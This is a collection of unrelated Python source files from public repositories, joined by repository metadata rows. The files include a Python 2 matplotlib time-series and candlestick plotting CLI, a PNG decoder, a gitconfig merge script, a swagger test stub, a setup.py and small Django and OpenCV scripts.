	# Python-2-only trick: each opts key becomes a local variable (sep, src, ...).
	for ky,va in opts.items():
		exec("{}=va".format(ky))
	#- Get data in datafram with selected [columns]
	df = get_csvdata(args,sep=sep,src=src,days=days,start=start,end=end,columns=columns,hdrLst=hdrLst)
	if df is None or len(df)<1 or df.size<1:
		return None
	if debugTF is True:
		print >> sys.stderr, df.head()
	#- Use backend to 'tkAgg' for cronjob
	if pngname is None or len(pngname)<=4:
		plt.switch_backend(backend)
	#- Create datetime index
	# The x-axis column may hold epochs (ms), yyyymmdd ints, or x_fmt strings.
	idxname='date'
	pbname=xaxis
	if pbname in df.columns:
		from _alan_date import ymd_parser,epoch_parser
		sdate = str(df[pbname].iloc[0])
		if sdate.isdigit() == True:
			# values > 123456789 are treated as epoch timestamps, else yyyymmdd
			if int(sdate)>123456789:
				idxpt=[epoch_parser(x) for x in df[pbname]]
			else:
				idxpt=[ymd_parser(x,fmt="%Y%m%d") for x in df[pbname]]
		else:
			idxpt=[ymd_parser(x,fmt=x_fmt) for x in df[pbname]]
		df.set_index(pd.DatetimeIndex(idxpt),inplace=True)
		df.index.rename(idxname,inplace=True)
		df = df.drop(pbname,1)
	elif idxname in df.columns:
		df[idxname] = pd.to_datetime(df[idxname])
		df.set_index(idxname,inplace=True)
	else:
		df = df.reset_index(drop=True)
	#- Create a pivot table
	trendName = None
	if pivot_group in df.columns and pivot_value in df.columns:
		trendName = df[pivot_group][0]
		df=df.pivot_table(index='date',columns=pivot_group,values=pivot_value)
	#- Create linear-interpolation for missing data
	if interpolateYN is True:
		df=df.apply(extrapolate_series,axis=0)
	#- Create return since inception
	# Each column is rebased to % return; initial values below $1 use $1.
	if rsiYN is True:
		de=[]
		for j in range(df.shape[1]):
			inix = df.iloc[0,j] if df.iloc[0,j]>1 else 1
			de.append(df.iloc[:,j]/inix*100.-100)
		#de = [df.iloc[:,j]/df.iloc[0,j]*100.-100 for j in range(df.shape[1])]
		df = pd.concat(de,axis=1)
	#- Create trend curve
	if trendTF is True:
		try:
			from _alan_pppscf import vertex_locator
			if trendName is None:
				trendName = df._get_numeric_data().columns[0]
			dg, dh = vertex_locator(df[trendName],npar=npar,debugTF=True)
			#df['trend'] = dg['trend'].values
			if debugTF is True:
				print >> sys.stderr, "Trendline dg:\n",dg
		except Exception, e:
			print >> sys.stderr, "**ERROR: {} @ {}".format(str(e),'vertex_locator()')
	if title is None:
		title="/".join(df.columns).upper()
		if rsiYN is True:
			title += " Return Since Inception"
	#- plot simple line plot
	if tsTF is False:
		df = df.reset_index(drop=True)
	if debugTF is True:
		print >> sys.stderr, df.head()
		print >> sys.stderr, df.tail()
	nobs=len(df.index)
	nsp = (nobs/nbins) if nobs>nbins*2 else nobs
	#ds=[y for j,y in enumerate(df.index) if j%nsp==0]
	#ax=df.plot(xticks=ds,title=title)
	# Chinese convention colors down moves green/up red reversed vs. US style.
	colorUD = ['red','green'] if lang=='cn' else ['green','red']
	# OHLC candlestick + MA/RSI/MACD combo chart: plot and return early.
	if ohlcComboTF is True:
		from alan_plot import plot_candlestickCombo
		from _alan_calc import run_tech
		chartType = 'minute' if pbname == 'epochs' else 'chart'
		ma1=5;ma2=30
		datax = run_tech(df, pcol='close',winLst=[ma1,ma2],nanTF=True)
		fig, axes = plot_candlestickCombo(datax,title,ma1,ma2,block=False,chartType=chartType,trendTF=trendTF,npar=npar,debugTF=debugTF,colorUD=colorUD)
		if pngname is not None and len(pngname)>4:
			plt.savefig(pngname)#, bbox_inches='tight',dpi=1000)
		else:
			plt.show(axes)
		return datax
	fig, ax=plt.subplots(figsize=(11,6))
	if ohlcTF is True:
		from alan_plot import plot_candlestick
		chartType = 'minute' if pbname == 'epochs' else 'chart'
		ax = plot_candlestick(df,tsidx=df.index,chartType=chartType,title=title,block=False,debugTF=debugTF,ax=ax,trendTF=trendTF,npar=npar,colorUD=colorUD)
		x_fmt = "%H:%M" if chartType == 'minute' else x_fmt
		print >> sys.stderr, df.describe()
	else:
		df.plot(ax=ax,grid=True,color=['yellow','green','red','cyan','lightgray','salmon'])
		#ax=df.plot(figsize=(11,6))
		ax.set_ylabel(df.columns[0])
		if trendTF is True:
			dg.plot(ax=ax)
	if rsiYN is True:
		ax.set_ylabel("return %")
	ax.grid(linestyle='dotted',linewidth=0.5)
	# Pick the x-axis tick locator/formatter from the sampling interval.
	if df.index._typ == "datetimeindex":
		mddfmt=mdates.DateFormatter(x_fmt)
		ax.xaxis.set_major_formatter(mddfmt)
		xtinterval=(df.index[1]-df.index[0])
		if xtinterval.days < 7 and xtinterval.days>=1 : # daily data
			ax.set_xlim(df.index[0], df.index[-1])
			#ax.xaxis.set_major_locator(mdates.MonthLocator(interval=int(nsp/30.+0.97)))
			bymd = [1,5,10,15,20,25] if nobs<50 else [1,15] if nobs<120 else [1]
			itv = 1 if nobs<160 else int(nsp/30.+0.97)
			xlocator = mdates.MonthLocator(bymonthday=bymd,interval=itv)
			ax.xaxis.set_major_locator(xlocator)
			# check if min/max of xaxis should be included major ticks
			if debugTF is True:
				print >> sys.stderr, ax.get_xticks(),ax.get_xlim()
			xtcks = list(ax.get_xticks())
			x1,x2 = xtcks[:2]
			xmin,xmax = ax.get_xlim()
			if (x1-xmin)>(x2-x1)*0.6:
				xtcks = [xmin] + xtcks
			if (xmax-xtcks[-1])>(x2-x1)*0.6:
				xtcks = xtcks + [xmax]
			ax.set_xticks(xtcks)
			ax.xaxis.set_minor_locator(mdates.MonthLocator(interval=1))
			if debugTF is True:
				print >> sys.stderr,ax.get_xticks()
				print >> sys.stderr, "Daily data use MonthLocator"
		elif xtinterval.seconds < 30: # second data
			locator = mdates.AutoDateLocator()
			locator.intervald[5] = [0,5,10,15,20,25,30,35,40,45,55]
			mddfmt = mdates.AutoDateFormatter(locator)
			mddfmt.scaled[1/(24.*60.)] = '%M:%S'
			ax.xaxis.set_major_locator(locator)
			ax.xaxis.set_major_formatter(mddfmt)
			print >> sys.stderr, "Second data use AutoDateLocator",xtinterval.seconds
		elif xtinterval.seconds < 100 : # minute data
			bym = [0,15,30,45] if nobs<=120 else [0,30] if nobs<=360 else [0]
			xlocator = mdates.MinuteLocator(byminute=bym, interval = 1)
			ax.xaxis.set_major_locator(xlocator)
			print >> sys.stderr, "Minute data use MinuteLocator",xtinterval.days
		else: # periodic data
			print >> sys.stderr, "Periodic data use DayLocator"
			ax.xaxis.set_major_locator(mdates.DayLocator(interval=nsp))
	ax.xaxis.label.set_visible(False)
	plt.title(title,fontsize=30,fontproperties=prop)
	plt.xticks(rotation='20',fontsize=12)
	if len(df.columns)>1 and ohlcTF is False:
		ax.legend(loc="upper left",prop=prop)
	#logo = mimage.imread("aicaas_icon.png")
	#plt.figimage(logo, xo=20,yo=420)
	plt.subplots_adjust(left=0.1,bottom=0.30)
	if pngname is not None and len(pngname)>4:
		plt.savefig(pngname)#, bbox_inches='tight',dpi=1000)
	else:
		plt.show(ax)
	return df
def opt_csv2plot(argv,retParser=False):
	""" command-line options initial setup
	Arguments:
		argv: list arguments, usually passed from sys.argv
		retParser: OptionParser class return flag, default to False
	Return: (options, args) tuple if retParser is False else OptionParser class
	"""
	parser = OptionParser(usage="usage: %prog [option] FILENAME", version="%prog 1.0",
		description="Time-series Plotting Utility via matplotlib")
	parser.add_option("-s","--sep",action="store",dest="sep",default="|",
		help="field separator (default: |)")
	parser.add_option("","--xaxis",action="store",dest="xaxis",default="pbdate",
		help="x-axis column name (default: pbdate in yyyymmdd)")
	parser.add_option("","--columns",action="store",dest="columns",
		help="selected columns (default: ALL)")
	parser.add_option("","--ren_header",action="store",dest="hdrLst",
		help="rename header columns")
	parser.add_option("-t","--title",action="store",dest="title",
		help="title (default: combo-colunms)")
	parser.add_option("-n","--nbins",action="store",dest="nbins",default="6",type=int,
		help="number of bins in x-axis (default: 6)")
	parser.add_option("","--return_since_inception",action="store_true",dest="rsiYN",default=False,
		help="use Return since Inception plot. Note: $1 will be used as the initial investment if the initial is less than $1")
	parser.add_option("","--interpolate",action="store_true",dest="interpolateYN",default=False,
		help="use linear-interplation for missing data")
	parser.add_option("","--pivot_group",action="store",dest="pivot_group",
		help="pivot table group by column, must pair with PIVOT_VALUE")
	parser.add_option("","--pivot_value",action="store",dest="pivot_value",
		help="pivot table display value column, must pair with PIVOT_GROUP")
	parser.add_option("","--x_fmt",action="store",dest="x_fmt",default='%m-%d-%y',
		help="graph x-axis format (default: %m-%d-%y)")
	parser.add_option("","--png",action="store",dest="pngname",
		help="graph name (default: None)")
	parser.add_option("","--backend",action="store",dest="backend",default='tkAgg',
		help="matplotlib new backend(default: tkAgg)")
	parser.add_option("","--no_time_series",action="store_false",dest="tsTF",default=True,
		help="Simple line plot no time-series")
	parser.add_option("-l","--lang",action="store",dest="lang",default="en",
		help="language mode [cn|en] (default: en), ohlc/ohlc_combo ONLY")
	parser.add_option("","--ohlc",action="store_true",dest="ohlcTF",default=False,
		help="plot stock OHLC Candlestick")
	parser.add_option("","--ohlc_combo",action="store_true",dest="ohlcComboTF",default=False,
		help="plot stock OHLC Candlestick + MA/RSI/MACD Combo")
	parser.add_option("","--src",action="store",dest="src",
		help="data source (FILENAME is treated as ticker/series if provided. default: None)")
	parser.add_option("","--start",action="store",dest="start",
		help="start YYYY-MM-DD, must pair with SRC (default: 2-years-ago)")
	parser.add_option("","--end",action="store",dest="end",
		help="end YYYY-MM-DD, must pair with SRC (default: today)")
	parser.add_option("","--days",action="store",dest="days",default=730,type=int,
		help="number of days from END date, must pair with SRC (default: 730)")
	parser.add_option("","--trendline",action="store_true",dest="trendTF",default=False,
		help="Draw trendline, apply to the 1st array ONLY")
	parser.add_option("","--npar",action="store",dest="npar",default=15,type="int",
		help="trendline fitting polynomial degree (default: 15)")
	parser.add_option("","--j2ts",action="store",dest="j2ts",
		help="jinja2 template script, (default: None).")
	parser.add_option("","--extra_js",action="store",dest="extraJS",
		help="extra JSON in DICT format.")
	parser.add_option("","--extra_xs",action="store",dest="extraXS",
		help="extra excutable string in k1=v1;k2=v2; format")
	parser.add_option("","--debug",action="store_true",dest="debugTF",default=False,
		help="debugging (default: False)")
	# argv[0] is the program name, so only the remainder is parsed.
	(options, args) = parser.parse_args(argv[1:])
	if retParser is True:
		return parser
	# Merge the --extra_js / --extra_xs payloads into the options dict;
	# failures are reported but do not abort (opts is set before extra_opts runs).
	try:
		opts = vars(options)
		from _alan_str import extra_opts
		extra_opts(opts,xkey='extraJS',method='JS',updTF=True)
		extra_opts(opts,xkey='extraXS',method='XS',updTF=True)
	except Exception as e:
		print >> sys.stderr, str(e)
	return (opts, args)
if __name__ == '__main__':
	# CLI entry point (Python 2 module: old-style except/print syntax below).
	opts,args = opt_csv2plot(sys.argv)
	try:
		df=run_csv2plot(args,opts)
		#print dataj2ts(opts['j2ts'],df,opts)
	except Exception, e:
		print >> sys.stderr, "**ERROR:",str(e)
| [
"facebook@beyondbond.com"
] | facebook@beyondbond.com |
2d34fe0d4f1b224a9e161de674ff2f540eaf6f3f | d3f448d238b435b48d8f27f17a34b3e39a70dc29 | /python-client/test/test_kyc_user_validation_share_holder_list_item_response_natural.py | 5639c0032162e82c676318d5d1ff7f90707312d0 | [] | no_license | pedroguirao/swagger | 1fc29b6d9bcc193bf8ce85f6d8a6074f4c37150d | 5ffea6203b5fcd3f201c2ede76d354302a6fb0ee | refs/heads/master | 2020-06-07T16:15:08.659567 | 2019-06-21T07:51:49 | 2019-06-21T07:51:49 | 193,055,538 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,180 | py | # coding: utf-8
"""
MarketPay API
API for Smart Contracts and Payments # noqa: E501
OpenAPI spec version: v2.01
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import swagger_client
from swagger_client.models.kyc_user_validation_share_holder_list_item_response_natural import KycUserValidationShareHolderListItemResponseNatural # noqa: E501
from swagger_client.rest import ApiException
class TestKycUserValidationShareHolderListItemResponseNatural(unittest.TestCase):
    """Generated unit-test stubs for KycUserValidationShareHolderListItemResponseNatural."""

    def setUp(self):
        # No shared fixtures are needed for these generated stubs.
        pass

    def tearDown(self):
        # Nothing to clean up.
        pass

    def testKycUserValidationShareHolderListItemResponseNatural(self):
        """Test KycUserValidationShareHolderListItemResponseNatural"""
        # FIXME: construct object with mandatory attributes with example values
        # model = swagger_client.models.kyc_user_validation_share_holder_list_item_response_natural.KycUserValidationShareHolderListItemResponseNatural() # noqa: E501
        pass
if __name__ == '__main__':
    # Allow running this test module directly with `python <file>`.
    unittest.main()
| [
"antonio.canovas@ingenieriacloud.com"
] | antonio.canovas@ingenieriacloud.com |
cf9fcbfc5f97eb28ceffeabff239359d989224bf | 4614e0d358cfd0a652805780049830a6175db032 | /setup.py | 8e7cfd56f66f747938969104997c709c295e8acd | [
"Apache-2.0"
] | permissive | PoncinMatthieu/skrm | bb2c48367d153681b12e150ff0214930dcba333c | 7aa0912907dfc3f8e8359568a727082fd9856523 | refs/heads/master | 2023-02-05T11:36:27.551935 | 2023-01-21T12:27:47 | 2023-01-21T12:27:47 | 8,715,387 | 5 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,222 | py | import os
import setuptools
def get_readme_content():
with open("README.md", "r") as f:
return f.read()
def get_package_version():
locals = {}
with open(os.path.join("skrm", "version.py")) as fd:
exec(fd.read(), None, locals)
return locals["__version__"]
setuptools.setup(
name="skrm",
version=get_package_version(),
author="Matthieu Poncin",
author_email="poncin.matthieu@gmail.com",
description="Simple keyring manager - Allows you to store keys associated to tags into an encrypted file, using GPG.",
long_description=get_readme_content(),
long_description_content_type="text/markdown",
url="https://github.com/PoncinMatthieu/skrm",
classifiers=[
"Development Status :: 5 - Production/Stable",
"Programming Language :: Python :: 3 :: Only",
"License :: OSI Approved :: Apache Software License",
"Operating System :: OS Independent",
"Topic :: Security :: Cryptography"
],
packages=setuptools.find_packages(include=["skrm", "skrm.*"]),
entry_points={
'console_scripts': [
'skrm = skrm.__main__:keyring_manager.run'
],
},
test_suite="tests"
)
| [
"matthieu@yousician.com"
] | matthieu@yousician.com |
07603d8448554819c35d830a5e8bac16fee86dfb | a71652fe89fe2236e9a05030ebf337e6e306bb21 | /palm_detection/main.py | 0f279c8df10362023c1059ba264ecfb5094677a0 | [
"Apache-2.0"
] | permissive | esimionato/oak-model-samples | e580affe8df6dcc01b6d26af8eb4f622fe28d01c | 0f99e9c6e5d884c1f9493e83fb6834453bcfabcb | refs/heads/main | 2023-04-13T04:43:39.306077 | 2021-04-29T14:35:10 | 2021-04-29T14:35:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 416 | py | import os
from modelplace_api.visualization import draw_detections_one_frame
from oak_inference_utils import inference
from palm_detection import InferenceModel
def main():
    """Run OAK inference for the palm-detection model with frame visualization."""
    # The model files live next to this script.
    root_model_path = os.path.abspath(os.path.dirname(__file__))
    inference(InferenceModel, root_model_path, draw_detections_one_frame)
if __name__ == "__main__":
    # Script entry point.
    main()
| [
"lx.lyashuk@gmail.com"
] | lx.lyashuk@gmail.com |
44ec93f5277d83d7adb38c625d69aebf21f7de01 | 6e04f50f02f265c0db42a2f0acced9c62dd1338e | /minion game.py | 44452caa5e48819276fec4075507c338f878ad85 | [] | no_license | Akashkumarsenthil/placement_practice_python | 36c2f8d6a4186f2bc125c5c59fd92574952a4305 | 8a5425068c03f9fac13864509968018cde308033 | refs/heads/master | 2022-12-06T00:18:33.782794 | 2020-08-17T17:46:33 | 2020-08-17T17:46:33 | 262,390,224 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 291 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sat Mar 28 13:18:39 2020
@author: akashkumar
"""
# The Minion Game: for the fixed word below, score every substring by its
# starting letter. Kevin (ks) owns substrings starting with a vowel, Stuart
# (ss) those starting with a consonant; a substring starting at index i
# contributes len(s) - i points.
vov = "AEIOU"
s = "BANANA"
n = len(s)
ks = sum(n - i for i, ch in enumerate(s) if ch in vov)
ss = sum(n - i for i, ch in enumerate(s) if ch not in vov)
print (ks)
print (ss)
"akashkumarsenthil@gmail.com"
] | akashkumarsenthil@gmail.com |
209fc872585b4a759ebdb5e8eb13d9892cdbba7c | 76833905305f1df9f7f400191bf11cc4dc023a8d | /push_git.py | 3477828858f9fa307b5dd08c560975b8ae4418ed | [] | no_license | akahuang/akarc | f22548b2cfcd40ede71f422421c6dcdbf6f8e331 | 99c4fe919dc5ee86e55d8632029b22a2759c9077 | refs/heads/master | 2016-09-06T18:05:08.330985 | 2013-11-07T04:45:01 | 2013-11-07T04:45:01 | 3,591,020 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 513 | py | #!/usr/bin/python
import os
src_file = './gitconfig'
des_file = os.environ['HOME'] + '/.gitconfig'
tmp_file = './gitconfig_temp'

# Sections of the existing ~/.gitconfig that must survive the push: these
# hold machine-local identity/credentials, everything else is replaced by
# the repo-tracked gitconfig.
ignore_tag = ['[user]\n', '[github]\n']

# Copy only the preserved sections into the temp file; `with` guarantees
# both handles are closed even if iteration fails part-way.
with open(des_file, 'r') as fin, open(tmp_file, 'w') as fout:
    keep_section = False
    for line in fin:
        # A line starting with '[' opens a new INI section; keep writing
        # only while inside one of the preserved sections.
        if line[0] == '[':
            keep_section = (line in ignore_tag)
        if keep_section:
            fout.write(line)

# Append the repo-tracked settings and install the result as ~/.gitconfig.
os.system('cat %s >> %s' % (src_file, tmp_file))
os.system('mv %s %s' % (tmp_file, des_file))
| [
"flarehunter@gmail.com"
] | flarehunter@gmail.com |
34b703bfe7e9850d90d611a783ed74ede903d8cb | 59a0c54e182712340ee4f499b53ab92d7188cb23 | /image_png.py | de3e8106b9e10cf555d8c1fe29c61b3bbc0d6dfb | [] | no_license | bobrekjiri/BrainfuckInterpreter | 5434e66ceeaecf5287f0617a426df22568b6ee5f | f056acda447203135b506fd8a396b725b8cb4a41 | refs/heads/master | 2016-09-06T17:23:41.760238 | 2013-06-04T18:55:05 | 2013-06-04T18:55:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,659 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import zlib
class PNGWrongHeaderError(Exception):
    """Raised when the file being read is apparently not a PNG image."""
    pass
class PNGNotImplementedError(Exception):
    """Raised when the PNG image uses a structure this reader cannot handle."""
    pass
class PngReader():
    """Minimal PNG reader.

    Supports only 8-bit-per-channel truecolour (RGB) images without
    interlacing (IHDR trailer b'\\x08\\x02\\x00\\x00\\x00'); anything else
    raises PNGNotImplementedError. After construction, `self.rgb` holds the
    image as a list of rows, each row a list of (R, G, B) tuples.
    """

    def byteArrayToNumber(self, array):
        """Interpret 4 bytes as a big-endian 32-bit unsigned integer."""
        return (array[0] << 24) + (array[1] << 16) + (array[2] << 8) + array[3]

    def paeth(self, a, b, c):
        """Paeth predictor (PNG filter type 4).

        Chooses whichever neighbour (left=a, above=b, upper-left=c) is
        closest to the initial estimate p = a + b - c.
        """
        p = a + b - c
        pa = abs(p - a)
        pb = abs(p - b)
        pc = abs(p - c)
        if pa <= pb and pa <= pc:
            return a
        elif pb <= pc:
            return b
        else:
            return c

    def getScanlines(self, data):
        """Split the decompressed IDAT stream into per-row records.

        Each scanline is 1 filter byte followed by `width` RGB triples,
        so a row occupies width*3 + 1 bytes. Returns a list of
        (filter_byte, [(r, g, b), ...]) pairs, one per image row.
        """
        lines = []
        for i in range(self.height):
            linedata = []
            base = i*((self.width * 3) + 1)
            for j in range(self.width):
                offset = j * 3
                rgb = (data[base + offset + 1], data[base + offset + 2], data[base + offset + 3])
                linedata.append(rgb)
            lines.append((data[base], linedata))
        return lines

    def decode(self, lines):
        """Undo the per-scanline PNG filters (types 0-4).

        Filters reference the already-reconstructed pixels: the previous
        pixel in the current row (newlinedata[j-1]) and/or the pixel(s)
        above in the previous output row (output[i-1]); out-of-bounds
        neighbours count as 0. All arithmetic is modulo 256 per channel.
        """
        output = []
        for i in range(self.height):
            linefilter = lines[i][0]
            linedata = lines[i][1]
            if linefilter == 0:
                # Filter 0 (None): row is stored verbatim.
                output.append(linedata)
            elif linefilter == 1:
                # Filter 1 (Sub): add the previous pixel in the same row.
                newlinedata = []
                newlinedata.append(linedata[0])
                for j in range(1,len(linedata)):
                    r = (linedata[j][0] + newlinedata[j-1][0]) % 256
                    g = (linedata[j][1] + newlinedata[j-1][1]) % 256
                    b = (linedata[j][2] + newlinedata[j-1][2]) % 256
                    newlinedata.append((r, g, b))
                output.append(newlinedata)
            elif linefilter == 2:
                # Filter 2 (Up): add the pixel directly above.
                if i == 0:
                    output.append(linedata)
                else:
                    newlinedata = []
                    for j in range(0,len(linedata)):
                        r = (linedata[j][0] + output[i-1][j][0]) % 256
                        g = (linedata[j][1] + output[i-1][j][1]) % 256
                        b = (linedata[j][2] + output[i-1][j][2]) % 256
                        newlinedata.append((r, g, b))
                    output.append(newlinedata)
            elif linefilter == 3:
                # Filter 3 (Average): add floor((left + above) / 2).
                newlinedata = []
                for j in range(0,len(linedata)):
                    fr = ((0 if j == 0 else newlinedata[j-1][0]) + (0 if i == 0 else output[i-1][j][0])) // 2
                    fg = ((0 if j == 0 else newlinedata[j-1][1]) + (0 if i == 0 else output[i-1][j][1])) // 2
                    fb = ((0 if j == 0 else newlinedata[j-1][2]) + (0 if i == 0 else output[i-1][j][2])) // 2
                    r = (linedata[j][0] + fr) % 256
                    g = (linedata[j][1] + fg) % 256
                    b = (linedata[j][2] + fb) % 256
                    newlinedata.append((r, g, b))
                output.append(newlinedata)
            elif linefilter == 4:
                # Filter 4 (Paeth): add the Paeth predictor of left/above/
                # upper-left, computed per channel.
                newlinedata = []
                for j in range(0,len(linedata)):
                    ra = 0 if j == 0 else newlinedata[j-1][0]
                    rb = 0 if i == 0 else output[i-1][j ][0]
                    rc = 0 if i == 0 or j == 0 else output[i-1][j-1][0]
                    ga = 0 if j == 0 else newlinedata[j-1][1]
                    gb = 0 if i == 0 else output[i-1][j ][1]
                    gc = 0 if i == 0 or j == 0 else output[i-1][j-1][1]
                    ba = 0 if j == 0 else newlinedata[j-1][2]
                    bb = 0 if i == 0 else output[i-1][j ][2]
                    bc = 0 if i == 0 or j == 0 else output[i-1][j-1][2]
                    r = (linedata[j][0] + self.paeth(ra, rb, rc)) % 256
                    g = (linedata[j][1] + self.paeth(ga, gb, gc)) % 256
                    b = (linedata[j][2] + self.paeth(ba, bb, bc)) % 256
                    newlinedata.append((r, g, b))
                output.append(newlinedata)
        return output

    def __init__(self, filepath):
        """Open `filepath`, validate it as PNG, and decode it into self.rgb.

        Raises PNGWrongHeaderError on a bad signature and
        PNGNotImplementedError on a CRC mismatch or unsupported format.
        """
        data = bytearray()
        with open(filepath, mode='br') as f:
            header = f.read(8)
            # The fixed 8-byte PNG signature.
            if header != b'\x89PNG\r\n\x1a\n':
                raise PNGWrongHeaderError()
            # Walk the chunk stream: 4-byte length, 4-byte type, payload,
            # 4-byte CRC over type+payload.
            while 1:
                sizeData = f.read(4)
                chunkSize = self.byteArrayToNumber(sizeData)
                chunkType = f.read(4)
                chunkData = f.read(chunkSize)
                chunkCRC = f.read(4)
                computedCRC = zlib.crc32(chunkType + chunkData)
                givenCRC = self.byteArrayToNumber(chunkCRC)
                if computedCRC != givenCRC:
                    raise PNGNotImplementedError()
                if chunkType == b'IDAT':
                    # Pixel data may span multiple IDAT chunks; concatenate.
                    data += chunkData
                elif chunkType == b'IHDR':
                    self.width = self.byteArrayToNumber(chunkData[0:4])
                    self.height = self.byteArrayToNumber(chunkData[4:8])
                    # Require bit depth 8, colour type 2 (RGB), default
                    # compression/filter, no interlace.
                    if chunkData[8:] != b'\x08\x02\x00\x00\x00':
                        raise PNGNotImplementedError()
                elif chunkType == b'IEND':
                    break
        decompressed = zlib.decompress(data)
        lines = self.getScanlines(decompressed)
        # RGB data of the image as a list of rows; each row holds one
        # (R, G, B) tuple per pixel.
        self.rgb = self.decode(lines)
| [
"bobrekjiri@gmail.com"
] | bobrekjiri@gmail.com |
61e9e6dde2b0b46ea65e8574120b84b1ac84b6d3 | 289462e18c368e9189dc68bef9ce4695900ab0c6 | /Artificial Intelligence/Adjusting the operating time of the sprinkler/Logic/Rule.py | 7d85aeccac0acba6b9ad4d2f8099568fc038979d | [] | no_license | tatarflavia/CS-UBB-projects | 4d933beea2e2c97355fc6a95311e1feef97232ef | 61f9113b1314180f7b40bba54cd99a195fefc521 | refs/heads/master | 2023-07-17T23:46:04.163457 | 2021-09-12T14:12:06 | 2021-09-12T14:12:06 | 298,521,030 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 892 | py | class FuzzyRule(object):
# conjunctive fuzzy rule; temperature and humidity => time
def __init__(self, inputs, out):
self.inputDescriptions = inputs #dictionary of descriptionName and region chosen
self.outputDescription = out #expected time region for the inputs given
def applyRule(self, fuzzyInputs):
# transforms fuzzy inputs into fuzzy output by applying this rule
# Receives a dictionary of all the input values {'humidity': {'dry': 0, 'normal': 0.9, 'wet': 0.1}, 'temperature': {..}} and returns the conjunction of their values,getting the min for each description
# and = min ; or = max
# returns a fuzzy value : of form [{time: '..'},Minvalue]
return [self.outputDescription,
min([fuzzyInputs[descName][regionName] for descName, regionName in self.inputDescriptions.items()])
]
| [
"tatar.flavia25@gmail.com"
] | tatar.flavia25@gmail.com |
6bdb32efa294dfb859cd7b99eb9f9700b6f6217e | 3c153c631f6663cdc239b0864c90f39396effeec | /display_all_gestures.py | 21d291ada2fbcf8082548b9726210c09825fab30 | [] | no_license | agentdragonborn/slr | 4dc0606f805aed0e70227cc8fbbefbcda10660d0 | 05bfed57a9b6cc68a908846d3173028f97988a86 | refs/heads/master | 2020-03-07T13:15:57.703122 | 2018-03-31T04:11:51 | 2018-03-31T04:11:51 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 940 | py | import cv2, os, random
import numpy as np
def get_image_size():
    """Return the (height, width) shape shared by all gesture images.

    Samples one known image (class 0, sample 100) in grayscale.
    """
    sample = cv2.imread('gestures/0/100.jpg', 0)
    return sample.shape
# Build and show a grid of gesture thumbnails: 5 random sample images per
# grid row, one column per gesture class.
gestures = os.listdir('gestures/')
gestures.sort(key=int)
begin_index = 0
end_index = 5
# NOTE(review): shape is (height, width); unpacking it as (x, y) and building
# zeros((image_y, image_x)) below transposes the axes. Harmless for square
# gesture images -- confirm if non-square images are ever used.
image_x, image_y = get_image_size()
# Number of grid rows (last row may be partially filled).
if len(gestures) % 5 != 0:
    rows = len(gestures) // 5 + 1
else:
    rows = len(gestures) // 5
full_img = None
for i in range(rows):
    col_img = None
    for j in range(begin_index, end_index):
        # Pick a random sample image from gesture class j.
        img_path = "gestures/%s/%d.jpg" % (j, random.randint(1, 1200))
        img = cv2.imread(img_path, 0)
        # cv2.imread returns None on a missing file; test identity instead of
        # the deprecated elementwise `== None` comparison on arrays.
        if img is None:
            img = np.zeros((image_y, image_x), dtype=np.uint8)
        if col_img is None:
            col_img = img
        else:
            col_img = np.hstack((col_img, img))
    begin_index += 5
    end_index += 5
    if full_img is None:
        full_img = col_img
    else:
        full_img = np.vstack((full_img, col_img))
cv2.imshow("gestures", full_img)
cv2.waitKey(0)
"noreply@github.com"
] | agentdragonborn.noreply@github.com |
37201c646a7df5155dcc8adffb9a2760f1ccc49e | edd319c79c04556a2c92dcd199adb1dbb1681039 | /project/django_project/blog/migrations/0005_auto_20181226_0344.py | e679daa12cf84e56e91c4106a819ebb1c09fe487 | [] | no_license | HeyFei/python | fc61627bff6b8788b0dce6d761cea25ddcf54ab7 | fd18df5374e65cea6fe21de11e055ab4234e1c4d | refs/heads/master | 2021-10-12T01:00:32.274910 | 2019-01-31T09:24:37 | 2019-01-31T09:24:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 380 | py | # Generated by Django 2.1.4 on 2018-12-26 03:44
from django.db import migrations
class Migration(migrations.Migration):
    # Auto-generated migration: removes the Reply model (and its author FK)
    # that was introduced by 0004_reply.

    dependencies = [
        ('blog', '0004_reply'),
    ]

    operations = [
        # Drop the FK field first so the model can be deleted cleanly.
        migrations.RemoveField(
            model_name='reply',
            name='author',
        ),
        migrations.DeleteModel(
            name='Reply',
        ),
    ]
| [
"sjm@33.cn"
] | sjm@33.cn |
a099eace761779e208bf5c9c8b0c650a9bdd1f89 | 511caee38fe751453f0307c7ce6b9b40642dc9a0 | /schedule/tests/BaseTestCase.py | 237fc8ee352540c0c4f0b4a894c44a43650df119 | [] | no_license | M1zz/greedyRainbow | 88839852eaa921355ed2b723acbc75e76f617c00 | f380e9ef8ab07152fd0f5646d42d955508d813cc | refs/heads/master | 2020-05-07T16:25:45.951239 | 2019-05-20T14:57:23 | 2019-05-20T14:57:23 | 180,682,033 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 176 | py | from django.test import TestCase
class BaseTestCase(TestCase):
    """Shared assertion helpers for the schedule app's test cases."""

    def assertHasAnyType(self, arr, cls):
        # Passes when at least one element of `arr` is an instance of `cls`.
        self.assertTrue(any(isinstance(item, cls) for item in arr))
"mizzking75@gmail.com"
] | mizzking75@gmail.com |
f417f51f5cf08c592eee41208b983cd2c88c6fc5 | 18bdf174975bb8fdbaf51a82c0509585e0cbf6d4 | /Degree/urls.py | 8a9d15a9bc5768ade1e26d252955a5f3f20a7228 | [] | no_license | kumarajeet024/degree | 4c90388ca0d05dbc1bdc2d517a2dea0ec717059a | 7b0fef11055c66b741182405886bd753cc75f083 | refs/heads/master | 2020-04-14T18:25:31.279846 | 2019-01-05T20:51:22 | 2019-01-05T20:51:22 | 164,017,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 796 | py | """Degree URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
